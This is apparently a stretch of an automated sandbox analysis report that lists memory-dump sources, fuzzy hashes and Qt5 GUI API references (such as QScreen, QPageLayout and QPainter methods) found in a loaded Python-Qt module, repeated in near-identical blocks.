                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?normalized@Vector4malloc
                                                                                                                                                                                                                • String ID: QVector4D$normalized$normalized(self) -> QVector4D
                                                                                                                                                                                                                • API String ID: 1827766097-3323703988
                                                                                                                                                                                                                • Opcode ID: 6ad133072ab4736a3ec3400560e1fbd9a32b697ca5d6c2a7e48dbb69081b56d8
                                                                                                                                                                                                                • Instruction ID: c4993687eec4de5087e7683368071a38b6cf105b0cb3b66557edb68fe5801009
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ad133072ab4736a3ec3400560e1fbd9a32b697ca5d6c2a7e48dbb69081b56d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 011109B5B08A46C1EB109F75E8486A937A8FB55B84FA180B6CE5C43320DF7CE58AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?availableVirtualGeometry@QScreen@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFB9A309938
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?availableGeometry@Rect@@Screen@@Virtualmalloc
                                                                                                                                                                                                                • String ID: QScreen$availableVirtualGeometry$availableVirtualGeometry(self) -> QRect
                                                                                                                                                                                                                • API String ID: 1132034619-658668139
                                                                                                                                                                                                                • Opcode ID: 70d772deee132c2f6916f7c94332a95f0946ec1b54fa0302aec55bb99a440d91
                                                                                                                                                                                                                • Instruction ID: 9039b33b26defc3651aba7d1af4e64360a0f2d18d53d59b4a9fcb864e76f488a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70d772deee132c2f6916f7c94332a95f0946ec1b54fa0302aec55bb99a440d91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C01139B5B08A56C1FB20DB35E8586A933A8FB55B84FA140B6CE4D03320CF7CE589C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?rect@QTextLine@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FFB9A2DF928
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?rect@Line@@RectTextmalloc
                                                                                                                                                                                                                • String ID: QTextLine$rect$rect(self) -> QRectF
                                                                                                                                                                                                                • API String ID: 462638365-1962109089
                                                                                                                                                                                                                • Opcode ID: cf662239448839f31bbee6e476c7c48ccff74cdc4ded2e7cf32c01e261c62c5a
                                                                                                                                                                                                                • Instruction ID: 9b389476c2a8e77b935670b88944912d3b0d51b6ddefdd713bd4083075640be9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf662239448839f31bbee6e476c7c48ccff74cdc4ded2e7cf32c01e261c62c5a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC1105B5B08A46C1EB20DF65E8987A933A8FB55B84FA180B6DE4D07320DF7DE549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?maximumMargins@QPageLayout@@QEBA?AVQMarginsF@@XZ.QT5GUI ref: 00007FFB9A2D7968
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?maximumLayout@@MarginsMargins@Pagemalloc
                                                                                                                                                                                                                • String ID: QPageLayout$maximumMargins$maximumMargins(self) -> QMarginsF
                                                                                                                                                                                                                • API String ID: 3742586513-3312970886
                                                                                                                                                                                                                • Opcode ID: 29ed9372ce1a48b58f039bdc3f7f8c0caf04ea248d9f56e02cf6a01735cbe073
                                                                                                                                                                                                                • Instruction ID: c515dc9b9d20c04ddab7f10581c911230642a443fdfeddd2c8e3605283d7fb9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29ed9372ce1a48b58f039bdc3f7f8c0caf04ea248d9f56e02cf6a01735cbe073
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 231109B5B08B4681EB10DF75E8486A937A8FB95B84FA140B6CD5D03320CF7DD549C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?clipRegion@QPainter@@QEBA?AVQRegion@@XZ.QT5GUI ref: 00007FFB9A335928
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?clipPainter@@Region@Region@@malloc
                                                                                                                                                                                                                • String ID: QPainter$clipRegion$clipRegion(self) -> QRegion
                                                                                                                                                                                                                • API String ID: 3434069321-3021533290
                                                                                                                                                                                                                • Opcode ID: 2797176d68d83b686acfcc6bdf3f721bc0506a80fcea6d86ed3d457d62377268
                                                                                                                                                                                                                • Instruction ID: f4c1b8938f1bd354a60ec7f37d8ea14123570904fcbc21327450a6060e956dc2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2797176d68d83b686acfcc6bdf3f721bc0506a80fcea6d86ed3d457d62377268
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 351109B5A18A86C1EB10DF75E8586A937A8FB95B94FA180B6CE4D03320DF7CD949C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?reportContentOrientationChange@QWindow@@QEAAXW4ScreenOrientation@Qt@@@Z.QT5GUI ref: 00007FFB9A2FF9B2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?reportChange@ContentOrientationOrientation@Qt@@@ScreenWindow@@
                                                                                                                                                                                                                • String ID: QWindow$reportContentOrientationChange$reportContentOrientationChange(self, orientation: Qt.ScreenOrientation)
                                                                                                                                                                                                                • API String ID: 1215209452-1000199096
                                                                                                                                                                                                                • Opcode ID: 6727e4980abbbf095930d45dc1becf1c22b216675a6ac41fcf949e31c130a0ca
                                                                                                                                                                                                                • Instruction ID: da48aa8c4d1e475bfbcae2c977640429ba5adb41a2bf0fdf048ad0197393bf11
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6727e4980abbbf095930d45dc1becf1c22b216675a6ac41fcf949e31c130a0ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD112EB5A18F4AC1EB20DF25E8886A933B8FB48B84FA14172CA5D03320DF7DD546C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?pageSize@QPageLayout@@QEBA?AVQPageSize@@XZ.QT5GUI ref: 00007FFB9A2D5998
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Page$?pageLayout@@Size@Size@@malloc
                                                                                                                                                                                                                • String ID: QPageLayout$pageSize$pageSize(self) -> QPageSize
                                                                                                                                                                                                                • API String ID: 2613872021-2360139822
                                                                                                                                                                                                                • Opcode ID: 5860a83f2e1248027eff42ce66db99774413a80c30333736479cffde4161f252
                                                                                                                                                                                                                • Instruction ID: 8fff228cc1e8019278c7eb686f4cd1c50c6b3cf70ab68a6c3a60259d5010645f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5860a83f2e1248027eff42ce66db99774413a80c30333736479cffde4161f252
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 211109B5A09A4681EB10DB75E8486A937A8FB95B84FA140B6C95D03320DFBDD549C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?supportedWritingSystems@QRawFont@@QEBA?AV?$QList@W4WritingSystem@QFontDatabase@@@@XZ.QT5GUI ref: 00007FFB9A32F9E8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
